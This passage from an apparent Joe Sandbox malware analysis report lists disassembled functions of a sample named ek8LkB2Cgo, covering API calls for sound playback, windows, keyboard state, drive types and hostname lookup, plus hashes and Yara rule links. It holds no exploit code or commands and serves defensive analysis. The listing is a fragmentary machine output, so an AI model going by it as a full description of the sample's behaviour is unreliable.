                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00537B7B
                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00537B8C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString
                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                  • API String ID: 890592661-1007645807
                                                                                  • Opcode ID: 50d88de5ae821e2a3c71550fa7dc0104155a104186e092bcd39b1ab909e1d864
                                                                                  • Instruction ID: 08a4ddd60aa827a59c8b8dcf51173a34f9ad8093dca796318dbbeb5bfdd80f1b
                                                                                  • Opcode Fuzzy Hash: 50d88de5ae821e2a3c71550fa7dc0104155a104186e092bcd39b1ab909e1d864
                                                                                  • Instruction Fuzzy Hash: C711B2F0A4026D79D720B762CC9ADFFBFBCFB96B18F00041A7511A20C1EA601A45C6B0
                                                                                  Function 0053778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • timeGetTime.WINMM ref: 00537794
                                                                                    • Part of subcall function 0050DC38: timeGetTime.WINMM(?,75A4B400,005658AB), ref: 0050DC3C
                                                                                  • Sleep.KERNEL32(0000000A), ref: 005377C0
                                                                                  • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 005377E4
                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00537806
                                                                                  • SetActiveWindow.USER32 ref: 00537825
                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00537833
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00537852
                                                                                  • Sleep.KERNEL32(000000FA), ref: 0053785D
                                                                                  • IsWindow.USER32 ref: 00537869
                                                                                  • EndDialog.USER32(00000000), ref: 0053787A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                  • String ID: BUTTON
                                                                                  • API String ID: 1194449130-3405671355
                                                                                  • Opcode ID: 839bac50960f510cea674edbfc0dbebee3360b8984676be978b5fea0f1218210
                                                                                  • Instruction ID: a4019dae8697b2594cf577d58d572ac3737b0aa6252575efe912008388db6766
                                                                                  • Opcode Fuzzy Hash: 839bac50960f510cea674edbfc0dbebee3360b8984676be978b5fea0f1218210
                                                                                  • Instruction Fuzzy Hash: 85214FB0604609AFEB515B60EC9DB267F79FB68359F000554F509A2162DB716D48FB20
                                                                                  Function 005402EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • CoInitialize.OLE32(00000000), ref: 0054034B
                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005403DE
                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 005403F2
                                                                                  • CoCreateInstance.OLE32(0057DA8C,00000000,00000001,005A3CF8,?), ref: 0054043E
                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005404AD
                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00540505
                                                                                  • _memset.LIBCMT ref: 00540542
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0054057E
                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005405A1
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 005405A8
                                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 005405DF
                                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 005405E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1246142700-0
                                                                                  • Opcode ID: 7cca69059579b133b8b141fd31ace0eee69a4ed16ecef4166a4d70d4c41d1f81
                                                                                  • Instruction ID: 5d00c61f014ec015a72aae467a607121ac63383d52c09899969572322b2d0638
                                                                                  • Opcode Fuzzy Hash: 7cca69059579b133b8b141fd31ace0eee69a4ed16ecef4166a4d70d4c41d1f81
                                                                                  • Instruction Fuzzy Hash: DEB1EA75A00209AFDB04DFA4C888DAEBBB9FF48304B148499F909EB251DB74ED45DF50
                                                                                  Function 00532E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00532ED6
                                                                                  • SetKeyboardState.USER32(?), ref: 00532F41
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00532F61
                                                                                  • GetKeyState.USER32(000000A0), ref: 00532F78
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00532FA7
                                                                                  • GetKeyState.USER32(000000A1), ref: 00532FB8
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00532FE4
                                                                                  • GetKeyState.USER32(00000011), ref: 00532FF2
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0053301B
                                                                                  • GetKeyState.USER32(00000012), ref: 00533029
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00533052
                                                                                  • GetKeyState.USER32(0000005B), ref: 00533060
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: 3efcf351f67f14a829fa9826e29ae337444db60e2607f8c6431fb03476414145
                                                                                  • Instruction ID: 4be3447b3695114e6c388549b9a5eb7f2a0c61ddc7131daf2d1a269f4bfaf6ee
                                                                                  • Opcode Fuzzy Hash: 3efcf351f67f14a829fa9826e29ae337444db60e2607f8c6431fb03476414145
                                                                                  • Instruction Fuzzy Hash: 6051E930A08BD429FB35DBB488557FABFF46F11340F08459DD5C25A1C2DA54AB8CDBA2
                                                                                  Function 0052ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 0052ED1E
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0052ED30
                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0052ED8E
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0052ED99
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0052EDAB
                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0052EE01
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0052EE0F
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0052EE20
                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0052EE63
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0052EE71
                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0052EE8E
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0052EE9B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                  • String ID:
                                                                                  • API String ID: 3096461208-0
                                                                                  • Opcode ID: d77667d0d866d6065a0b500dd327158d5ef11ea9c80fc88a23f555b5c5c4be12
                                                                                  • Instruction ID: afa8e67653dc8492445cd73130d815ff0215f68db7a951eacea5691a9b2f18e4
                                                                                  • Opcode Fuzzy Hash: d77667d0d866d6065a0b500dd327158d5ef11ea9c80fc88a23f555b5c5c4be12
                                                                                  • Instruction Fuzzy Hash: F9512EB1B00205AFDB18DF68DD86AAEBBBAFF98710F14812DF519D62D0D7709D449B10
                                                                                  Function 0050B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0050B759,?,00000000,?,?,?,?,0050B72B,00000000,?), ref: 0050BA58
                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0050B72B), ref: 0050B7F6
                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0050B72B,00000000,?,?,0050B2EF,?,?), ref: 0050B88D
                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 0056D8A6
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0050B72B,00000000,?,?,0050B2EF,?,?), ref: 0056D8D7
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0050B72B,00000000,?,?,0050B2EF,?,?), ref: 0056D8EE
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0050B72B,00000000,?,?,0050B2EF,?,?), ref: 0056D90A
                                                                                  • DeleteObject.GDI32(00000000), ref: 0056D91C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 641708696-0
                                                                                  • Opcode ID: e1e2222b1f44dae59de3d1b3197bc4fbdda7b971df14e4416c5458e8a0397005
                                                                                  • Instruction ID: ece7f4a485309d5098f6b50dbc74dac55cff4e92f86807af26a3d4f95f310579
                                                                                  • Opcode Fuzzy Hash: e1e2222b1f44dae59de3d1b3197bc4fbdda7b971df14e4416c5458e8a0397005
                                                                                  • Instruction Fuzzy Hash: D0615A30A01A01DFEB659F14D998B29BBF5FFA4315F244A1DE04687AB0CB70B894EF54
                                                                                  Function 0050B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B526: GetWindowLongW.USER32(?,000000EB), ref: 0050B537
                                                                                  • GetSysColor.USER32(0000000F), ref: 0050B438
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorLongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 259745315-0
                                                                                  • Opcode ID: ca2839c0eb568f7a0f77bb1969b530ed6dc64cbd03030c7c824b48c2e54e6a54
                                                                                  • Instruction ID: 1bfd06a1b6fa98afd666b47cd0ba1ee746d00de6c5740c71197dfdc76782a36d
                                                                                  • Opcode Fuzzy Hash: ca2839c0eb568f7a0f77bb1969b530ed6dc64cbd03030c7c824b48c2e54e6a54
                                                                                  • Instruction Fuzzy Hash: C4418E30500144ABEF205F28A889BBD3F76BF56721F584661FD698E1E6D7318D81E731
                                                                                  Function 0053690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                  • String ID:
                                                                                  • API String ID: 136442275-0
                                                                                  • Opcode ID: a37d85bc498c834c5f0e573f8534201ca7cb438cda98e03292da65a0d82f6271
                                                                                  • Instruction ID: 6180f43ebc11ad16d1171986392e40b1cbd88f1a9cc07ee6a2269bfe97f2b9c0
                                                                                  • Opcode Fuzzy Hash: a37d85bc498c834c5f0e573f8534201ca7cb438cda98e03292da65a0d82f6271
                                                                                  • Instruction Fuzzy Hash: B1412E7784511DAEDF61EB90DC45DCAB7BCFB84300F1041E6B659A2091EE70ABE58F50
                                                                                  Function 0053D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(0058DC00,0058DC00,0058DC00), ref: 0053D7CE
                                                                                  • GetDriveTypeW.KERNEL32(?,005A3A70,00000061), ref: 0053D898
                                                                                  • _wcscpy.LIBCMT ref: 0053D8C2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                  • API String ID: 2820617543-1000479233
                                                                                  • Opcode ID: fe196674aa55ac315aa3c62919160bc713a56b3658aed8bc384a8f7982d443a2
                                                                                  • Instruction ID: 0d62f86054b748200a5e76d7cc10e64d5da2766dcef4a4690f6859ab825eb4e1
                                                                                  • Opcode Fuzzy Hash: fe196674aa55ac315aa3c62919160bc713a56b3658aed8bc384a8f7982d443a2
                                                                                  • Instruction Fuzzy Hash: 2D518135104305AFC700EF14E896A6EFBB5FF85318F20892DF599572A2DB31ED05CA52
                                                                                  Function 004F936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __swprintf.LIBCMT ref: 004F93AB
                                                                                  • __itow.LIBCMT ref: 004F93DF
                                                                                    • Part of subcall function 00511557: _xtow@16.LIBCMT ref: 00511578
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                  • API String ID: 1502193981-2263619337
                                                                                  • Opcode ID: 728fd55d045764b8bbc52794e227b38bd5ff6eb6729fb206fac604e3d5d540db
                                                                                  • Instruction ID: 70c2cc74e9c85753fc9715793e1d7511a234e5acdefa2926c6fa7fb886a7cca2
                                                                                  • Opcode Fuzzy Hash: 728fd55d045764b8bbc52794e227b38bd5ff6eb6729fb206fac604e3d5d540db
                                                                                  • Instruction Fuzzy Hash: B141D472500209ABEB24DF74D946FBA7BE8FB88300F20446FE649D72C1EA359D42CB15
                                                                                  Function 0055A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0055A259
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0055A260
                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0055A273
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0055A27B
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0055A286
                                                                                  • DeleteDC.GDI32(00000000), ref: 0055A28F
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0055A299
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0055A2AD
                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0055A2B9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                  • String ID: static
                                                                                  • API String ID: 2559357485-2160076837
                                                                                  • Opcode ID: 44e612dd05794cd6b33f8bd269247ab6b9c57d9f5cc54973abb52982175f2846
                                                                                  • Instruction ID: 9ecfd6ad48d8ae8e3f907fcfd385b71aa9df525e684cea60ece2f92646c22a04
                                                                                  • Opcode Fuzzy Hash: 44e612dd05794cd6b33f8bd269247ab6b9c57d9f5cc54973abb52982175f2846
                                                                                  • Instruction Fuzzy Hash: 68318D31100215ABDF115FA4EC4AFEA3F79FF19361F100315FA19A60A0C736D859EBA4
                                                                                  Function 00536F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                  • String ID: 0.0.0.0
                                                                                  • API String ID: 2620052-3771769585
                                                                                  • Opcode ID: dea133e691f8b9de96cbe3d97e5f8c23746c617f40378d10919ba183a5c82d51
                                                                                  • Instruction ID: 1c050865223cd2c16737007f14a42d48279f22c2a3e6ae5b896b687069d1dccf
                                                                                  • Opcode Fuzzy Hash: dea133e691f8b9de96cbe3d97e5f8c23746c617f40378d10919ba183a5c82d51
                                                                                  • Instruction Fuzzy Hash: 2911B471904119BBDB24AB60AC4EEEA7FBCFF90710F004069F549A6091EFB0DEC59B61
                                                                                  Function 0051500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00515047
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  • __gmtime64_s.LIBCMT ref: 005150E0
                                                                                  • __gmtime64_s.LIBCMT ref: 00515116
                                                                                  • __gmtime64_s.LIBCMT ref: 00515133
                                                                                  • __allrem.LIBCMT ref: 00515189
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005151A5
                                                                                  • __allrem.LIBCMT ref: 005151BC
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005151DA
                                                                                  • __allrem.LIBCMT ref: 005151F1
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0051520F
                                                                                  • __invoke_watson.LIBCMT ref: 00515280
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                  • String ID:
                                                                                  • API String ID: 384356119-0
                                                                                  • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                  • Instruction ID: 7439a6952368d99ca73beec1ee1ad4d2ed689ece81b3909e3a6fd13091bfb799
                                                                                  • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                  • Instruction Fuzzy Hash: 9171C276A00F17EBF714AE78CC45BAA7BA8BF95364F14422AE510D62C1F770D9808BD0
                                                                                  Function 00534DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00534DF8
                                                                                  • GetMenuItemInfoW.USER32(005B1708,000000FF,00000000,00000030), ref: 00534E59
                                                                                  • SetMenuItemInfoW.USER32(005B1708,00000004,00000000,00000030), ref: 00534E8F
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00534EA1
                                                                                  • GetMenuItemCount.USER32(?), ref: 00534EE5
